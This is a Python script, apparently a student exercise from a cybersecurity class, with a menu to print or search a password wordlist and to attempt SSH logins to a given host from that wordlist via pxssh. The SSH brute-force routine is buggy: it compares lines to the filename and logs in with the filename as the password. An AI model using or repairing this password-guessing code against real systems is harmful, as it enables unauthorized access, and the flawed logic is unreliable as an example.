#! /usr/bin/env python3
# Harrison EVans
# 10/26/21
# Sources:         
#  https://www.geeksforgeeks.org/python-how-to-search-for-a-string-in-text-files/
#  https://github.com/codefellows/seattle-cyber-401d3/blob/main/class-16/challenges/DEMO.md
# 


# Libraries

#import os
#import itertools
#import getpass
import time
from pexpect import pxssh

# Functions
def main():
    while True:
        choice=input("""
        ***Watcha Watcha Want!***
1 - Iterate Dictionary/Wordlist
2 - Search Dictionary/Wordlist
3 - SSH
4 - Exit Menu
Please Select Mode:
""")
        if choice=="1":
            iterator()
        elif choice=="2":
            inspector()
        elif choice=="3":
            option3()
            time.sleep(5)
        elif choice=="4":
            break
        else:
            print("You Shall not PASS! Try Again.")

def iterator():
    path=input("Enter Path to Wordlist/Dictionary:")
    file=open(path, encoding="ISO-8859-1")
    line=file.readline() #reads the lines in the file into variable "line"
    while line:   #reads through the lines of the file and prints them to screen
        line=line.rstrip()
        #word=line   why?
        print(line)
        time.sleep(1)
        line=file.readline()
    file.close()

def inspector():
    path=input("Enter Path to Wordlist/Dictionary:")
    passwd=input("Enter Password For Search:")
    file=open(path, "r")
    flag=0  # sets starting point for the list
    index=0
    for line in file:
        index+=1
        if passwd in line: # if the password matches the current line, break loop
            flag=1
            break

    if flag==1: # if the password was matched above, print confirmation and line number
        print("That Password Was Found!","Line", index)

def option3():
    s = pxssh.pxssh()
    host = input("Enter IP of Host: ")
    username = input("Enter Username: ")
    pswd = input("Enter File with password list: ")
    filename = open(pswd, "r", encoding = "ISO-8859-1")
    fileline=filename.readlines()
    for line in fileline:
        if str(line)==pswd:

            try:
                s.login(host, username, pswd)
                s.sendline('uptime')
                s.prompt()
                print(s.before)
                s.sendline('ls -l')
                s.prompt()
                print(s.before)
                s.sendline('df')
                s.prompt()
                print(s.before)
                s.logout()
            except pxssh.ExceptionPxssh as e:
                print("pxssh failed on login.")
                print(e)

# Main
main()

# End 
